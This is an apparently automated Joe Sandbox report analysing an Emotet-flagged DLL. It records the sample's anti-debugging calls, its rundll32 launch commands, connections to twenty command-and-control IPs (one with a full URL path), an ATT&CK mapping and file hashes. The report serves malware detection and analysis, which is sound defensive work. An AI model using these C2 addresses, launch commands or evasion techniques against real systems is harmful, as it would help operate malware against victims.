Source: svchost.exe, 00000010.00000002.487907364.00000283AAA70000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.488027417.00000283AAAE3000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.488035561.00000283AAAEF000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859853416.0000015DEBE4A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000015.00000002.859453634.0000015DE6829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW]

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F31FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6F31FF39

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F31BB30 GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,SetLastError,HeapFree,SetLastError,

3_2_6F31BB30

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31F416 mov eax, dword ptr fs:[00000030h]	3_2_6F31F416
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F3214AE mov eax, dword ptr fs:[00000030h]	3_2_6F3214AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31F416 mov eax, dword ptr fs:[00000030h]	4_2_6F31F416
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F3214AE mov eax, dword ptr fs:[00000030h]	4_2_6F3214AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001DE10 mov eax, dword ptr fs:[00000030h]	4_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_1001DE10 mov eax, dword ptr fs:[00000030h]	5_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DE10 mov eax, dword ptr fs:[00000030h]	6_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DE10 mov eax, dword ptr fs:[00000030h]	7_2_1001DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001DE10 mov eax, dword ptr fs:[00000030h]	8_2_1001DE10

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6F31FF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31C66F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6F31C66F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F31CEA2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6F31CEA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31FF39 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6F31FF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31C66F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6F31C66F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F31CEA2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6F31CEA2

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 196.44.98.190 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 177.72.80.14 168	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL			Jump to behavior

Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000008.00000002.877731004.0000000003780000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F31D07B cpuid

3_2_6F31D07B

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F31CAD3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_6F31CAD3

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.3.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.fa6a40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.f66ce0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.f66ce0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.fa6a40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.c16c78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.c16c78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.359009454.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.431973841.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.365562801.0000000000F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.382797966.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.877277824.0000000003233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.359302351.0000000000C16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.361400733.0000000000BDA000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection112	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Security Software Discovery41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
qrb6jVwzoe.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://schemas.xml	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://51.178.61.60/BCcDzRknSjFPjuOxHLZvVqcO	0%	Avira URL Cloud	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://51.178.61.60/BCcDzRknSjFPjuOxHLZvVqcO	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000010.00000002.488035561.00000283AAAEF000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859918261.0000015DEBE88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000010.00000003.469550789.00000283AB39E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.469585503.00000283AB3B3000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xml	svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anon	svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/enumeration	svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmp	false		high
http://help.disneyplus.com.	svchost.exe, 00000010.00000003.468408043.00000283AB37D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.468696929.00000283AB802000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528000
Start date:	24.11.2021
Start time:	16:47:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	qrb6jVwzoe (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winDLL@20/7@0/22
EGA Information:	Failed
HDC Information:	Successful, ratio: 74.5% (good quality ratio 65.4%) Quality average: 69.3% Quality standard deviation: 32.6%
HCA Information:	Successful, ratio: 91% Number of executed functions: 64 Number of non-executed functions: 49
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226, 20.54.110.249, 209.197.3.8, 23.35.236.56 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/528000/sample/qrb6jVwzoe.dll

Simulations

Behavior and APIs

Time	Type	Description
16:49:49	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
196.44.98.190	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	AWB_NO_9284730932.exe	Get hash	malicious	Browse	45.32.28.45
	arm6-20211124-0649	Get hash	malicious	Browse	44.168.42.223
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	149.28.253.196
	FhP4JYCU7J.exe	Get hash	malicious	Browse	149.28.253.196
	FhP4JYCU7J.exe	Get hash	malicious	Browse	149.28.253.196
	bomba.arm	Get hash	malicious	Browse	44.168.169.161
	44E401AAF0B52528AA033257C1A1B8A09A2B10EDF26ED.exe	Get hash	malicious	Browse	149.28.253.196
	77012C024869BA2639B54B959FAB1E10EBAAF8EBB9BFC.exe	Get hash	malicious	Browse	149.28.253.196
	WQRrng5aiw.exe	Get hash	malicious	Browse	149.28.253.196
	WQRrng5aiw.exe	Get hash	malicious	Browse	149.28.253.196
	5giHvDqMaL	Get hash	malicious	Browse	45.63.53.236
	22BA4262D93379DE524029DAFC7528E431E56A22CB293.exe	Get hash	malicious	Browse	149.28.253.196
	6PZ6S2YGPB	Get hash	malicious	Browse	45.63.53.204
	kq5Of3SOMZ.exe	Get hash	malicious	Browse	149.28.253.196
	QABYgAqa5Z.exe	Get hash	malicious	Browse	149.28.253.196
	ZrAv540yA4.exe	Get hash	malicious	Browse	216.128.137.31
	6Xtf11WnP2.exe	Get hash	malicious	Browse	216.128.137.31
	M9WBCy4NNi.exe	Get hash	malicious	Browse	216.128.137.31
	aBGNeDS7yM.exe	Get hash	malicious	Browse	149.28.253.196
	aBGNeDS7yM.exe	Get hash	malicious	Browse	149.28.253.196
EcobandGH	1711.doc	Get hash	malicious	Browse	196.44.98.190
	n6J7QJs4bk.dll	Get hash	malicious	Browse	196.44.109.73
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	196.44.98.190
	wNjqkrm8pH.dll	Get hash	malicious	Browse	196.44.98.190
	5YO8hZg21O.dll	Get hash	malicious	Browse	196.44.98.190
	dUGnMYeP1C.dll	Get hash	malicious	Browse	196.44.98.190
	yFAXc9z51V.dll	Get hash	malicious	Browse	196.44.98.190
	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	196.44.98.190
	eyPPiz3W6u.dll	Get hash	malicious	Browse	196.44.98.190
	HjYSwxqyUn.dll	Get hash	malicious	Browse	196.44.98.190
	f47YPsvRI3.dll	Get hash	malicious	Browse	196.44.98.190
	2n64VXT08V.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	ReadMe[2021.11.22_12-15].vbs	Get hash	malicious	Browse	51.178.61.60
	cTplVWrqRR.dll	Get hash	malicious	Browse	51.178.61.60
	NErdgsNsKR.vbs	Get hash	malicious	Browse	51.178.61.60
	F.A.Q[2021.11.22_12-15].vbs	Get hash	malicious	Browse	51.178.61.60
	Q1KL4ickDw.dll	Get hash	malicious	Browse	51.178.61.60
	yZGYbaJ.dll	Get hash	malicious	Browse	51.178.61.60
	1711.doc	Get hash	malicious	Browse	51.178.61.60
	cs.exe	Get hash	malicious	Browse	51.178.61.60
	0MGLPJiSa5.dll	Get hash	malicious	Browse	51.178.61.60
	0MGLPJiSa5.dll	Get hash	malicious	Browse	51.178.61.60
	bbyGAgHI9O.dll	Get hash	malicious	Browse	51.178.61.60
	Vs6ZDk0LMC.dll	Get hash	malicious	Browse	51.178.61.60
	sTh52oTZDh.dll	Get hash	malicious	Browse	51.178.61.60
	loveTubeLike.dll	Get hash	malicious	Browse	51.178.61.60
	2SR3psYDHQ.js	Get hash	malicious	Browse	51.178.61.60
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	51.178.61.60
	Fuutbqvhmc.dll	Get hash	malicious	Browse	51.178.61.60
	wNjqkrm8pH.dll	Get hash	malicious	Browse	51.178.61.60
	5YO8hZg21O.dll	Get hash	malicious	Browse	51.178.61.60
	dUGnMYeP1C.dll	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24937995859143758
Encrypted:	false
